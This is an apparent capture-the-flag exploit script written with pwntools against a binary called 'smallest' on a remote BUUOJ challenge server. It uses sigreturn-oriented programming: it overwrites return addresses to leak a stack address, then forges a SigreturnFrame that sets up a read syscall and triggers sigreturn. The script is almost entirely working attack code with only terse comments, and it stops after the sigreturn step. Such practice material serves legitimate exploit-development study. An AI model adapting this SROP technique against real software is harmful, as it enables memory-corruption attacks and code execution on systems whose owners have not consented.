from pwn import * from LibcSearcher import * small = ELF('./smallest')
sh = remote('node4.buuoj.cn',29624) # sh = process('./smallest') context.arch = 'amd64' context.log_level = 'debug'
syscall_ret = 0x00000000004000BE start_addr = 0x00000000004000B0 ## set start addr three times payload = p64(start_addr) * 3 sh.send(payload) sleep(1) ## modify the return addr to start_addr+3 ## so that skip the xor rax,rax; then the rax=1 ## get stack addr sh.send('\xb3') stack_addr = u64(sh.recv()[8:16]) log.success('leak stack addr :' + hex(stack_addr)) sleep(1)
## make the rsp point to stack_addr ## the frame is read(0,stack_addr,0x400) sigframe = SigreturnFrame() sigframe.rax = constants.SYS_read sigframe.rdi = 0 sigframe.rsi = stack_addr sigframe.rdx = 0x400 sigframe.rsp = stack_addr sigframe.rip = syscall_ret payload = p64(start_addr) + 'a' * 8 + str(sigframe) sh.send(payload) # gdb.attach(sh) # raw_input() sleep(1)
## set rax=15 and call sigreturn sigreturn = p64(syscall_ret) + 'b' * 7 sh.send(sigreturn)